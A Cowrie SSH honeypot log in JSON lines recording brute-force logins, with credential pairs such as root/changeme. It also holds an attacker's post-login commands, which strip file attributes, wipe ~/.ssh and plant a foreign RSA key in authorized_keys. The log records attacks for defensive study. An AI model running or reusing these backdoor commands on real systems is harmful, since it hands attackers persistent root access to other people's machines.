{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T05:17:09.841892Z","src_ip":"92.118.39.62","session":"59372137847a"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-09-09T05:17:09.932828Z","src_ip":"92.118.39.62","session":"59372137847a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:17:10.965424Z","src_ip":"92.118.39.62","session":"59372137847a"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":53124,"dst_ip":"1.2.3.4","dst_port":22,"session":"270b8f873018","protocol":"ssh","message":"New connection: 14.103.112.104:53124 (1.2.3.4:22) [session: 270b8f873018]","sensor":"my-vps","timestamp":"2025-09-09T05:17:22.947256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:17:22.951452Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:17:23.147108Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.login.success","username":"root","password":"2wsx_Zaq1","message":"login attempt [root/2wsx_Zaq1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:17:24.496142Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:17:25.393931Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:17:25.394691Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:17:25.395486Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:17:25.598338Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:17:26.012561Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:17:26.013287Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:17:26.975293Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:17:26.976351Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":34076,"dst_ip":"1.2.3.4","dst_port":22,"session":"95fe9361a519","protocol":"ssh","message":"New connection: 14.103.112.104:34076 (1.2.3.4:22) [session: 95fe9361a519]","sensor":"my-vps","timestamp":"2025-09-09T05:17:27.171617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:17:27.172416Z","src_ip":"14.103.112.104","session":"95fe9361a519"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:17:28.124650Z","src_ip":"14.103.112.104","session":"95fe9361a519"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:17:29.462074Z","src_ip":"14.103.112.104","session":"95fe9361a519"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:17:30.653259Z","src_ip":"14.103.112.104","session":"95fe9361a519"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":34090,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d6778e9fdec","protocol":"ssh","message":"New connection: 14.103.112.104:34090 (1.2.3.4:22) [session: 5d6778e9fdec]","sensor":"my-vps","timestamp":"2025-09-09T05:17:33.952441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:17:33.953957Z","src_ip":"14.103.112.104","session":"5d6778e9fdec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:17:34.914904Z","src_ip":"14.103.112.104","session":"5d6778e9fdec"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:17:35.481472Z","src_ip":"14.103.112.104","session":"5d6778e9fdec"}
{"eventid":"cowrie.session.closed","duration":"13.1","message":"Connection lost after 13.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:17:36.000045Z","src_ip":"14.103.112.104","session":"270b8f873018"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:17:36.496202Z","src_ip":"14.103.112.104","session":"5d6778e9fdec"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":42134,"dst_ip":"1.2.3.4","dst_port":22,"session":"70da5d04bfb5","protocol":"ssh","message":"New connection: 14.103.112.104:42134 (1.2.3.4:22) [session: 70da5d04bfb5]","sensor":"my-vps","timestamp":"2025-09-09T05:18:34.378375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:18:39.935800Z","src_ip":"14.103.112.104","session":"70da5d04bfb5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:18:39.936598Z","src_ip":"14.103.112.104","session":"70da5d04bfb5"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:18:39.938255Z","src_ip":"14.103.112.104","session":"70da5d04bfb5"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":42000,"dst_ip":"1.2.3.4","dst_port":22,"session":"12697c7dcae9","protocol":"ssh","message":"New connection: 14.103.112.104:42000 (1.2.3.4:22) [session: 12697c7dcae9]","sensor":"my-vps","timestamp":"2025-09-09T05:19:10.057582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:19:10.058430Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:19:10.866517Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.login.success","username":"root","password":"changeme","message":"login attempt [root/changeme] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:19:12.603400Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:19:13.477295Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:19:13.478012Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:19:13.479134Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:19:13.671576Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:19:14.110566Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:19:14.111341Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:19:14.301830Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:19:14.302823Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":59822,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bd35715766a","protocol":"ssh","message":"New connection: 14.103.112.104:59822 (1.2.3.4:22) [session: 1bd35715766a]","sensor":"my-vps","timestamp":"2025-09-09T05:19:14.507771Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:19:14.511469Z","src_ip":"14.103.112.104","session":"1bd35715766a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:19:14.718932Z","src_ip":"14.103.112.104","session":"1bd35715766a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:19:16.641221Z","src_ip":"14.103.112.104","session":"1bd35715766a"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:19:18.374191Z","src_ip":"14.103.112.104","session":"1bd35715766a"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":59834,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6c7e28af0b9","protocol":"ssh","message":"New connection: 14.103.112.104:59834 (1.2.3.4:22) [session: f6c7e28af0b9]","sensor":"my-vps","timestamp":"2025-09-09T05:19:18.580008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:19:21.544997Z","src_ip":"14.103.112.104","session":"f6c7e28af0b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@opens